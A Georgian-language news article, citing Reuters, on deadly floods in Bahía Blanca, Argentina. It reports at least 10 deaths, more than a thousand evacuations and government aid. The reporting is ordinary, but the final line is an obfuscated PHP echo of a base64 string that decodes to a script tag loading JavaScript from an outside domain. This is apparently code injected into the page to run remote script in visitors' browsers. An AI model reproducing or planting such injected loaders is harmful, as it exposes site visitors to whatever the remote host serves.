tube
ავერსი jaluzi

არგენტინის ქალაქ ბაია ბლანკაში წყალდიდობის შედეგად, სულ მცირე, 10 ადამიანი დაიღუპა, - ამის შესახებ ინფორმაციას სააგენტო Reuters-ი ავრცელებს.

„დახმარების უზრუნველსაყოფად ყველა რესურსი მობილიზებულია, მათ შორის, მუნიციპალური გუნდები, პროვინციის ხელისუფლება, საზღვაო ფლოტი და არგენტინის არმია“, - წერს ქალაქის ხელისუფლება X-ზე.

ადგილობრივი ხელისუფლების ცნობით, ძლიერმა წვიმამ ბუენოს-აირესის პროვინციაში მდებარე ქალაქ ბაია ბლანკაში ხიდები და გზები გაანადგურა, რის გამოც ათასზე მეტი ადამიანის ევაკუაცია გახდა საჭირო.

არგენტინის ეკონომიკის მინისტრმა, ლიუს კაპუტომ განაცხადა, რომ მთავრობამ ბაია ბლანკას დასახმარებლად 10 მილიარდი პესო გამოყო.

97
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");